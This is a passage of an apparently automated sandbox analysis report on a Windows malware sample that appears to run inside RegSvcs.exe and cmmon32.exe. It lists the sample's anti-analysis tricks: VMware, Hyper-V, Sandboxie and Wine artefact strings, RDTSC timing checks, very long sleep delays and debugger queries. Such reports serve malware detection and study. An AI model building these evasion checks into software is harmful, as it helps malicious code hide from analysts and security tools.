            Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
            Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeCode function: 0_2_0241E8E0 push eax; ret
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeCode function: 0_2_0241D374 pushfd ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041B3B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041B46C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041B402 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041B40B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CE07 pushfd ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A3D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A2D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078BBDB push edi; retf
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078B3B5 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078B46C push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078B40B push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078B402 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078CE07 pushfd ; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.81629816462
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.258d828.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9JzK89dRiaBYTuN.exe PID: 6048, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007785E4 second address: 00000000007785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 000000000077897E second address: 0000000000778984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004088B0 rdtsc
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe TID: 6040Thread sleep time: -39792s >= -30000s
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4968Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2200Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeThread delayed: delay time: 39792
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000002.00000000.363289775.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000002.00000000.363174585.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: cmmon32.exe, 00000005.00000002.605137350.0000000002E50000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW##
            Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000002.00000000.356977430.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000002.00000000.363174585.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000002.00000000.356977430.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: cmmon32.exe, 00000005.00000002.605137350.0000000002E50000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000002.00000000.361509902.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000002.00000000.361509902.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000002.00000000.363289775.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: explorer.exe, 00000002.00000000.346086899.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004088B0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409B20 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A669A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A9D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A13B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A13B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12AE4 mov eax, dword ptr fs:[00000030h]
